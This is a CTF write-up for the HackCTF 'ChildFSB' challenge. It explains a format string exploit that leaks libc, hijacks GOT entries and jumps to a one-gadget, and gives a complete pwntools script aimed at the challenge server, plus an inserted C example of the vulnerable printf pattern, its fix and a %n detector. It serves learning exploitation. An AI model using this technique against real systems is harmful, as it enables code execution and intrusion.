pwn/HackCTF

ChildFSB

lok2h4rd 2022. 3. 20. 13:47

problem

This challenge has to be exploited through a format string bug (FSB) using only 25 bytes of input.


mitigation


main

A format string bug occurs in main, and 1 byte of the canary can be overwritten.

With the first format string I leaked the address of __libc_start_main and overwrote 2 bytes of the __stack_chk_fail GOT entry so that the canary check failure goes back into main.

After that I overwrote the lower 3 bytes of the __libc_start_main GOT entry with a one-gadget address, then overwrote the __stack_chk_fail GOT entry with the __libc_start_main PLT address.
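The pattern behind the bug described above, as an added C illustration that is not the challenge source (the writeup does not include it): the vulnerable call beside its fix, plus a helper that counts memory-writing conversions in untrusted format text, the kind of check an input-validation layer or fuzzer harness would run.

```c
#include <stdio.h>
#include <string.h>

/* Constructed illustration, not the challenge binary's source (which is not in
   the writeup): the pattern that makes a format string bug, its fix, and a
   small audit helper for untrusted format text. */

#define INPUT_MAX 24

/* Vulnerable: the user's bytes become printf's format string, so "%n"-family
   directives write to addresses placed in the buffer (the GOT writes above)
   and "%p" reads stack slots (the libc leak). */
void echo_vulnerable(const char *user)
{
    char buf[INPUT_MAX + 1];
    strncpy(buf, user, INPUT_MAX);
    buf[INPUT_MAX] = '\0';
    printf(buf);        /* gcc -Wformat-security warns about this call */
}

/* Fixed: user data is only an argument, so any directives in it print literally. */
void echo_fixed(const char *user)
{
    printf("%s", user);
}

/* Audit helper: count conversions in untrusted text that would write memory
   ("%n" with any length modifier). "%%" is a literal percent, not a directive. */
int count_write_directives(const char *s)
{
    int writes = 0;
    const char *p = s;
    while (*p) {
        if (*p++ != '%')
            continue;
        if (*p == '%') { p++; continue; }
        while (*p && strchr("0123456789$-+ #.*", *p))
            p++;            /* flags, width or "$" position, precision */
        while (*p && strchr("hlLjzt", *p))
            p++;            /* length modifier: hh, h, l, ll, j, z, t, L */
        if (*p == 'n')
            writes++;
        if (*p)
            p++;            /* consume the conversion character */
    }
    return writes;
}
```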


from pwn import *


p = remote("ctf.j0n9hyun.xyz", 3037)
#p = process("./childfsb")
libc = ELF("libc.so.6")

#gdb.attach(p)


# GOT entries of the (non-PIE) binary
cnry = 0x601020         # __stack_chk_fail@got
start_main = 0x601040   # __libc_start_main@got

# one_gadget offsets for the remote libc
oneshot = [0x45216, 0x4526a, 0xf02a4, 0xf1147]

def ovr_byte(data):
    # "%<data>c%8$hhn" writes one byte to the pointer found at the 8th
    # positional argument (the start of our buffer on the stack);
    # pad so that the address appended afterwards is 8-byte aligned
    payload = "%{}c".format(str(data))
    payload += "%8$hhn"
    payload += "A" * (8 - int(len(payload) % 8 ))
    return bytes(payload, 'ascii')

def send_pay(payload):
    p.recvuntil(b"hello\n")
    p.send(payload)


# 1st input: overwrite 2 bytes of __stack_chk_fail@got so the canary check
# failure goes back into main, and leak a __libc_start_main pointer via %11$p
payload = b"%1887c%8$hn%11$p"
payload += p64(cnry)
payload += b"A" * (0x19 - len(payload))
send_pay(payload)

p.recvuntil(b"0x")
libc_start_main = int(p.recv(12), 16)


# the leaked value is __libc_start_main+240, so subtract it to get the base
libc_base = libc_start_main - libc.symbols['__libc_start_main'] - 240
oneshot_addr = libc_base + oneshot[0]


log.info("libc_start_main: " + hex(libc_start_main - 240))
log.info("libc_base: " + hex(libc_base))
log.info("oneshot: " + hex(oneshot_addr))


# lower 3 bytes of the one-gadget address, written one byte at a time
first_b = oneshot_addr & 0xff
sec_b = (oneshot_addr >> 8) & 0xff
third_b = (oneshot_addr >> 16) & 0xff

log.info("1st_byte: " + hex(first_b))
log.info("2nd_byte: " + hex(sec_b))
log.info("3rd_byte: " + hex(third_b))

# 2nd-4th inputs: overwrite __libc_start_main@got byte by byte
payload = ovr_byte(first_b)
payload += p64(start_main)
payload += b"A" * (0x19 - len(payload))
send_pay(payload)


payload = ovr_byte(sec_b)
payload += p64(start_main+1)
payload += b"A" * (0x19 - len(payload))
send_pay(payload)


payload = ovr_byte(third_b)
payload += p64(start_main+2)
payload += b"A" * (0x19 - len(payload))
send_pay(payload)

# 5th input: point __stack_chk_fail@got at __libc_start_main@plt (1536 = 0x600),
# so the next canary check failure calls the one-gadget through the PLT
payload = b"%1536c%8$hn%11$p"
payload += p64(cnry)
payload += b"A" * (0x19 - len(payload))
send_pay(payload)

p.interactive()


flag